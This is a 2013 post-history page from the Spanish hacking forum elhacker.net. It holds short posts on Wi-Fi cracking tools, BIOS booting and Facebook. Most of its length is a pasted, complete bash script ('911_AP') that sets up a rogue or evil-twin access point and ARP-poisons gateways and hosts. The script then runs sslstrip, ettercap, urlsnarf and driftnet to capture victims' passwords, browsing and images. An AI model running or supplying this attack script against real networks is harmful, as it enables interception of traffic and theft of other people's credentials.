elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18
31  Foros Generales / Dudas Generales / Re: ¿como se configura la bios para que arranque primero el pendrive? en: 7 Marzo 2013, 17:53 pm
a mi cuando me pasa esto me llevo la iso en el pen i el programa unetboting le das hala opcion instalacion en el disco duro i te ara un menu en el arrnaque  i inicias desde el disco igual que si fuera un live cd i para desistalarlo inicias unetbooting i te borrarala opcion del arraque
32  Seguridad Informática / Hacking Wireless / problema al crear roge ap. essid aleatorio en: 6 Marzo 2013, 22:57 pm
cuando creo un roge ap el essid me cambia todo el rato halas redes que me rodean. el comando que uso es este airbase-ng -c  -e -a  -I 600 -0 mon0


-c Channel Flag

-C Seconds
-e <ESSID>

-A specifies ad-hoc mode

-i iface

lo e intentado tambien con este script pongo ap static pero se me cambia el essid es como si se asociara  halas redes que tengo a mi alcance i creara el ap falso



Código:
#!/bin/bash
# script coded by em3rgency
# 911_AP version 1.0
# xwininfo -id $(xprop -root | awk '/_NET_ACTIVE_WINDOW\(WINDOW\)/{print $NF}')
# This script creates a FAKE Access Points and loads the tools to enumerate connected clients. And it actually works!
# Also includes workin ARP poisoning features.
# Tested and working on BT5r3, Needs to have version 1.3 of dhcp3-server to work correctly
# DOES NOT WORK with ISC-dhcp-server


#DEFINED COLOR SETTINGS
RED=$(tput setaf 1 && tput bold)
GREEN=$(tput setaf 2 && tput bold)
STAND=$(tput sgr0)
BLUE=$(tput setaf 6 && tput bold)

echo ""
echo ""
echo ""
echo $RED"              +############################################+"
echo $RED"              +    em3rgency's Fake AP SSL MITM script     +"
echo $RED"              +                                            +"
echo $RED"              +                Version 1.0                 +"
echo $RED"              +                                            +"
echo $RED"              +           www.Top-Hat-Sec.com              +"
echo $RED"              +############################################+"
echo ""
echo $BLUE"     Visit http://www.top-hat-sec.com for updates to this script. Thanks"
echo ""
echo ""
sleep 3
clear

echo $BLUE"                    em3rgency's MITM script Version 1.0 !"
echo
echo $RED"              ************************************************";
echo $RED"              *    1.  Prerequsites and Updates              *";
echo $RED"              *    2.  Run FAKE AP Static                    *";
echo $RED"              *    3.  Run EVIL TWIN AP                      *";
echo $RED"              *    4.  Run Standard ARP poison               *";
echo $RED"              *    5.  Netdiscover connected clients         *";
echo $RED"              *    6.  EXIT                                  *";
echo $RED"              ************************************************";
echo ""

echo $BLUE"                          Select Menu Option:"
read menuoption
if [ $menuoption = "1" ]; then
clear
echo ""
echo $RED"                   **************************************";
echo $RED"                   *    1.  Run apt-get update          *";
echo $RED"                   *    2.  Run apt-get upgrade         *";
echo $RED"                   *    3.  Distribution upgrade        *";
echo $RED"                   *    4.  Install Dhcp3-server        *";
echo $RED"                   *    5.  Update aircrack-ng          *";
echo $RED"                   *    6.  Return to Main Menu         *";
echo $RED"                   **************************************";


echo $BLUE"                           Select Menu Option:"$STAND
read menuoption
if [ $menuoption = "1" ]; then

#This command will look for any upgrades to your OS distro.
sudo apt-get update
clear
./911_AP.sh
else

#This command will look for any upgrades to your OS distro.
if [ $menuoption = "2" ]; then
sudo apt-get upgrade
clear
./911_AP.sh
else

#This command will look for any distribution upgrades to your OS distro.
if [ $menuoption = "3" ]; then
sudo apt-get dist-upgrade  
clear
./911_AP.sh
else

#This command will Install DHCP3-server on BT5r3
if [ $menuoption = "4" ]; then
apt-get install dhcp3-server
clear
./911_AP.sh
else

#This command will update aircrack-ng to the latest nightly build
if [ $menuoption = "5" ]; then
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
svn co http://trac.aircrack-ng.org/svn/branch/airoscript-ng/ airoscript-ng
clear
else
if [ $menuoption = "6" ]; then
./911_AP.sh
fi
fi
fi
fi
fi
fi
else
if [ $menuoption = "2" ]; then
#This command will RUN The STATIC FAKE AP attack
sleep 2

# Configuring your Network interfaces
echo
echo $BLUE"                   [+] Lets get started shall we [+]"
echo $STAND""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear

echo $BLUE"              Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation
mkdir -p "/var/run/dhcpd"
echo "authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}" > /var/run/dhcpd/dhcpd.conf

# FAKEAP setup
echo $BLUE"             Configuring and Starting your FAKE Access Point...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Setup your IP Tables
echo $BLUE"                       Configuring your IP tables...."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP
echo $BLUE"                  Setting up DHCP to work with $ESSID...."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd3 -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dchpid=$!
sleep 3
echo ""

# SSLstrip
echo $BLUE"                Starting SSLstrip to enumerate user credentials...."
sudo xterm  -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# mkdir
echo $BLUE"            Creating /var/run/ettercap directory to save passwords...."
mkdir -p /var/run/ettercap
sleep 1
echo

# Ettercap
echo $BLUE"                  Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /var/run/ettercap/passwords.txt -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf
echo $BLUE"           Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

# Driftnet
echo $RED"        [##########################################################]"
echo $RED"        [    Do you want to run Driftnet to capture images???      ]"
echo $RED"        [             saved to /var/run/driftnetdata               ]"
echo $RED"        [                        Y or N                            ]"  
echo $RED"        [##########################################################]"


read DRIFT
echo ""

if [ $DRIFT = "y" ] ; then
mkdir -p "/var/run/driftnet/driftnetdata"
echo $BLUE"                Starting Driftnet to gather victims images."
driftnet -i $internet_interface -p -d /var/run/driftnet/driftnetdata & dritnetid=$!
sleep 3
fi

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo $RED"    ####################################################################"
echo $RED"    [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo $RED"    [                                                                  ]"
echo $RED"    [     Press Y THEN ENTERKEY to close kill and clean up the script  ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
echo ""
echo ""
read WISH

# Kill all
if [ $WISH = "y" ] ; then
echo
echo $BLUE"                           Cleaning up your mess"$STAND
echo ''
sleep 2

kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${urlsnarfid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
clear
echo ""
echo ""
echo $RED"             [+][+][+]     Everything is now cleaned up      [+][+][+]"
echo $RED"             [+][+][+]Please visit http://www.top-hat-sec.com[+][+][+]"
echo $RED"             [+][+][+]          Coded by em3rgency           [+][+][+]"
sleep 5
exit

fi

sleep 3
clear

./911_AP.sh
else

# This command will RUN The EVIL TWIN AP attack
if [ $menuoption = "3" ]; then
sleep 3

# Configuring your Network interfaces
echo
echo $BLUE"                       [+] Lets get started shall we [+]"$STAND
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo ""
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear

echo $BLUE"               Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation
mkdir -p "/var/run/dhcpd"
echo "authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}" > /var/run/dhcpd/dhcpd.conf

# FAKEAP setup
echo $BLUE"                     Configuring and Starting $ESSID...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -P -C 60 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Setup your IP Tables
echo "                          Configuring your IP tables...."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP
echo "                   Setting up DHCP to work with EVIL TWIN AP...."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd3 -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dchpid=$!
sleep 3
echo ""

# SSLstrip
echo "               Starting SSLstrip to enumerate user credentials...."
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# mkdir
echo "            Creating /var/run/ettercap directory to save passwords...."
mkdir -p /var/run/ettercap
sleep 1
echo

# Ettercap
echo "                 Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /var/run/ettercap/passwords.txt -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf
echo "            Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

# Driftnet
echo $RED"          [##########################################################]"
echo $RED"          [    Do you want to run Driftnet to capture images???      ]"
echo $RED"          [             saved to /var/run/driftnetdata               ]"
echo $RED"          [                        Y or N                            ]"  
echo $RED"          [##########################################################]"


read DRIFT
echo ""

if [ $DRIFT = "y" ] ; then
mkdir -p "/var/run/driftnet/driftnetdata"
echo "                Starting Driftnet to gather victims images."
driftnet -i $internet_interface -p -d /var/run/driftnet/driftnetdata & dritnetid=$!
sleep 3
fi

#SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo $RED"     ####################################################################"
echo $RED"     [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo $RED"     [                                                                  ]"
echo $RED"     [    Press Y THEN ENTERKEY to close kill and clean up the script   ]"
echo $RED"     [                                                                  ]"
echo $RED"     [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"     ####################################################################"
echo $STAND""
echo ""
read WISH

# Kill all
if [ $WISH = "y" ] ; then
echo
echo $BLUE"                           Cleaning up your mess"
echo ''
sleep 2

kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${urlsnarfid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
clear
echo ""
echo ""
echo $RED"             [+][+][+]     Everything is now cleaned up      [+][+][+]"
echo $RED"             [+][+][+]Please visit http://www.top-hat-sec.com[+][+][+]"
echo $RED"             [+][+][+]          Coded by em3rgency           [+][+][+]"$STAND
sleep 5

fi

sleep 3
clear
./911_AP.sh
else

# Credits to N1t0g3n for the base to this section. Thanks bro
if [ $menuoption = "4" ]; then
clear
echo ""
echo ""
echo $BLUE"                  Finding wireless and ethernet interfaces."$STAND
sleep 3
echo ""
ifconfig -a | cut -d " " -f1 | sed '/^$/d' | egrep -v 'lo|vm'
echo ""
echo ""
echo "Please type the name of your wireless interface (wlan0): "
read WIFACE
sleep 2
echo ""
echo ""
echo "Please type the name of your ethernet interface (eth0): "
read ETH0
clear
echo ""
echo ""
clear
echo $RED"              **************************************************";
echo $RED"              *    1.  Attack entire Gateway through LAN       *";
echo $RED"              *    2.  Attack entire Gateway through Wireless  *";
echo $RED"              *    3.  Attack single host through LAN          *";
echo $RED"              *    4.  Attack single host through Wireless     *";
echo $RED"              *    5.  Return to Main Menu                     *";
echo $RED"              **************************************************";
echo $STAND""
echo ""
echo $BLUE"                           Select Menu Option: "
read menuoption
if [ $menuoption = "1" ]; then
echo
echo
echo "                This should be your Gateway from what I see: "
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your Gateway in below: "$STAND
read GATEWAY
echo $BLUE"                         Starting attack on Gateway"
echo ""
echo ""
echo "                   Passwords will show up in ettercap window"
sleep 3
echo "1" > /proc/sys/net/ipv4/ip_forward

#  PORT redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# URLSnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -e urlsnarf -i $ETH0 &
sleep 2

# Ettercap
xterm -bg blue -fg white -geometry 80x7-0+366 -s -sb -si +sk -sl 5000 -e ettercap -Tq -i $ETH0 -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -e tail -f sslstrip.log &
sleep 2



clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "2" ]; then
#This will allow you to forward packets from the router
echo $BLUE"              This should be your gateway from what I see: "$STAND
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $BLUE"Please type the IP of your gateway: "$STAND
read GATEWAY
echo $BLUE"                      Starting attack on gateway"
echo ""
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3


echo "1" > /proc/sys/net/ipv4/ip_forward


# URLSnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Etterap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "3" ]; then
#This will allow you to forward packets from the router
echo ""
echo ""
echo $BLUE"              This should be your gateway from what I see: "
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your gateway: "
read GATEWAY3
echo ""
echo ""
echo "Please type the IP of the target host: "
read HOST3
echo ""
echo $BLUE"                      Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward

# URLsnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -e urlsnarf -i $ETH0 &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e ettercap -TqM ARP:REMOTE /$GATEWAY3/ /$HOST3/ &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "4" ]; then
echo ""
echo ""
echo $BLUE"This should be your Gateway from what I see: "
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your gateway: "
read GATEWAY4
echo ""
echo "Please type the IP of the target host: "
read HOST4
echo ""
echo $BLUE"                     Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward


# URLsnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY4/ /$HOST4/ &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
clear

echo $RED"                Invalid option, you must choose 1,2,3,4 or 5.."
sleep 2
echo $BLUE"                          Re-Launching Script..."
./911_AP.sh
fi
fi
fi
fi
if [ $menuoption = "5" ]; then
./911_AP.sh
fi
else
if [ $menuoption = "5" ]; then
# A script to quickly tell whose on your network in real time.
clear
echo $BLUE"           This will show all The clients connected to The network"
echo ""
sleep 3
clear
echo
echo
echo $STAND"Please type the name of your network interface Example: eth0 "
read IFACE;
echo ""
echo ""
echo "               This should be your gateway from what I see: "
route -n -A inet | grep UG
sleep 1
echo ""
echo ""
echo $STAND"Please type in the IP address of your gateway"
read GATEWAY;
sleep 2
clear
echo ""
echo ""
echo ""
echo $BLUE"                   Press CTRL C to stop close netdiscover"
sudo xterm -bg blue -fg white -e netdiscover -i $IFACE -r $GATEWAY/24  
echo ""
echo ""
echo $RED"    ####################################################################"
echo $RED"    [           em3rgency's Netdiscover script is now running          ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY
clear
./911_AP.sh

else
if [ $menuoption = "6" ]; then
exit
fi
fi
fi
fi
fi
fi
33  Seguridad Informática / Hacking Wireless / Re: recuperar clave cambiada con wlanreaver? solucionado en: 6 Marzo 2013, 22:42 pm
nada de eso lo que hice para no estar cambiando de ruter ante la devilidad del cifrado web hice un Hotspot
con Connectify.  . en todas las preguntas que e podido  solucionar e puesto la solucioin  no me mateis por una vez que no e puesto la solucion Sorry
34  Foros Generales / Noticias / Re: El nuevo diseño de Facebook será presentado esta semana en: 5 Marzo 2013, 00:10 am
facebook es mui aburrido nada personalizable
35  Seguridad Informática / Hacking Wireless / Re: recuperar clave cambiada con wlanreaver? solucionado en: 1 Marzo 2013, 06:51 am
solucionado cerrar
36  Seguridad Informática / Hacking Wireless / Re: recuperar clave cambiada con wlanreaver? en: 28 Febrero 2013, 01:11 am
ya busque antes nada a lo que busco referente a wlanreaver i la pregunta que formulo
37  Programación / .NET (C#, VB.NET, ASP) / Re: [APORTE] Splitty v1.5 [Source code] en: 27 Febrero 2013, 12:42 pm
mui interesante gracias
38  Seguridad Informática / Hacking Wireless / Re: recuperar clave cambiada con wlanreaver? en: 27 Febrero 2013, 10:17 am
no quiero recuperar la clave solo es saber si con ese ataque sacarían mi clave.  mi ruter si no hay nadie conectado no suelta arp. no funciona chopchop ni framentacion
39  Seguridad Informática / Hacking Wireless / recuperar clave cambiada con wlanreaver? solucionado en: 26 Febrero 2013, 22:33 pm
se puede recuperar una clave cambiada con el ataque de diccionario del wlanreaver.


por si hay dudas esta encriptacion la uso cuando conecto mi ds lite.
el ruter es mio la clave la la tengo. solo pregunto si se puede recuperar la clave cambiada con el ataque de diccionario del wlanreaver
40  Seguridad Informática / Hacking Wireless / duda wlanreaver en: 25 Febrero 2013, 22:59 pm
la duda es la siguiente si el ataque dicionario del wlanreaver sirve con la clave cambiada? gracias

Títulos descriptivos y no eso. Ya llevas posts para saber las normas
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines